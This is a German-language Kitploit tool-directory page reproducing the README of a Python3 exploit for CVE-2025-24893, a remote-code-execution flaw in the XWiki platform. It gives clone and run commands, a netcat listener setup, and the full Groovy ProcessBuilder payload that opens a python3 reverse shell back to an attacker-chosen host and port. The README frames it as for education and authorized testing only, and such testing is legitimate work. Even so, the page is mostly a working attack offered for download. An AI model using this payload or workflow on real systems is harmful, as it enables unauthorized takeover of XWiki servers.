Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-24893 — Python3-Exploit für CVE-2025-24893, eine Sicherheitslücke für Remote-Code-Ausführung (RCE) in der XWiki-Plattform. Erkennt automatisch HTTPS/HTTP, erstellt ein Groovy async macro-Payload und liefert eine konfigurierbare Reverse Shell für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Python3-Exploit für CVE-2025-24893, eine Sicherheitslücke für Remote-Code-Ausführung (RCE) in der XWiki-Plattform. Erkennt automatisch HTTPS/HTTP, erstellt ein Groovy async macro-Payload und liefert eine konfigurierbare Reverse Shell für autorisierte Sicherheitstests.

Repository anzeigen
51vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24893 XWiki RCE Exploit

Exploit Banner

Ein einfaches Python3-Skript zur Ausnutzung von CVE-2025-24893, einer Remote-Code-Ausführung-Sicherheitslücke in der XWiki-Plattform, unter Verwendung eines Groovy-basierten async-Makros und einer konfigurierbaren Reverse-Shell-Payload.

⚠️ WARNUNG: Dieses Tool wird nur für Bildungszwecke und autorisierte Tests bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.


Table of Contents

  • Features
  • Requirements
  • Installation
  • Usage
  • Detection & Protocol Fallback
  • Reverse Shell Payload
  • License
  • Disclaimer

Funktionen

  • ✅ Erkennt automatisch, ob das Ziel HTTPS oder HTTP unterstützt
  • ✅ Erstellt ein Groovy-ProcessBuilder-Snippet, um die Eigenheiten von Runtime.exec zu vermeiden
  • ✅ URL-kodiert die XWiki-async+groovy-Makro-Payload
  • ✅ Konfigurierbare Reverse-Shell (Host + Port)
  • ✅ Gibt den HTTP-Response-Code aus, um die Zustellung zu überprüfen

  • Voraussetzungen

    • Python 3.6 oder höher
    • requests-Bibliothek
    root@kitploit:~
    pip install requests
    

    Installation

    Klonen Sie dieses Repository:

    root@kitploit:~
    git clone https://github.com/hackersonsteroids/cve-2025-24893.git
    cd cve-2025-24893
    

    Verwendung

    root@kitploit:~
    ./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
    
    • <TARGET_DOMAIN> Der XWiki-Host (z. B. wiki.example.local).

    • <LHOST> Die IP Ihres Angreiferrechners (wo Ihr Listener läuft).

    • <LPORT> Ihr Listener-Port (Ganzzahl).


    Beispiel

    1. Starten Sie einen Listener auf Ihrem Rechner:
    root@kitploit:~
    nc -lvnp 4444
    
    1. Führen Sie das Exploit aus:
    root@kitploit:~
    ./exploit.py wiki.vulnerable.local 10.0.0.5 4444
    
    1. Überprüfen Sie bei Erfolg Ihren netcat-Listener auf eine Shell.

    Erkennung & Protokoll-Fallback

    Vor dem Senden der Payload führt das Skript Folgendes aus:

    1. Versucht https://<TARGET_DOMAIN>
    2. Fällt auf http://<TARGET_DOMAIN> zurück, falls HTTPS fehlschlägt
    3. Beendet sich, wenn keines erreichbar ist

    Dies hilft, die Kompatibilität mit gemischten Protokollbereitstellungen sicherzustellen.


    Reverse-Shell-Payload

    Standardmäßig verwendet das Skript einen Python3-Einzeiler:

    root@kitploit:~
    new ProcessBuilder(
      ['/bin/bash','-c',
       'python3 -c \'import socket,subprocess,os;'
       's=socket.socket();s.connect(("LHOST",LPORT));'
       'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
       'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
    ).redirectErrorStream(true).start()
    
    • Sie können die build_payload()-Funktion ändern, wenn Sie eine andere Shell benötigen (z. B. Bash, Perl, PHP usw.).

    Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert. Weitere Details finden Sie in der LICENSE-Datei.


    Haftungsausschluss

    Dieses Tool ist ausschließlich für autorisierte Sicherheitsbewertungen und Bildungszwecke bestimmt. Die Autoren übernehmen keine Verantwortung für Missbrauch. Holen Sie stets eine ausdrückliche Genehmigung ein, bevor Sie Zielsysteme testen.

    Tool herunterladen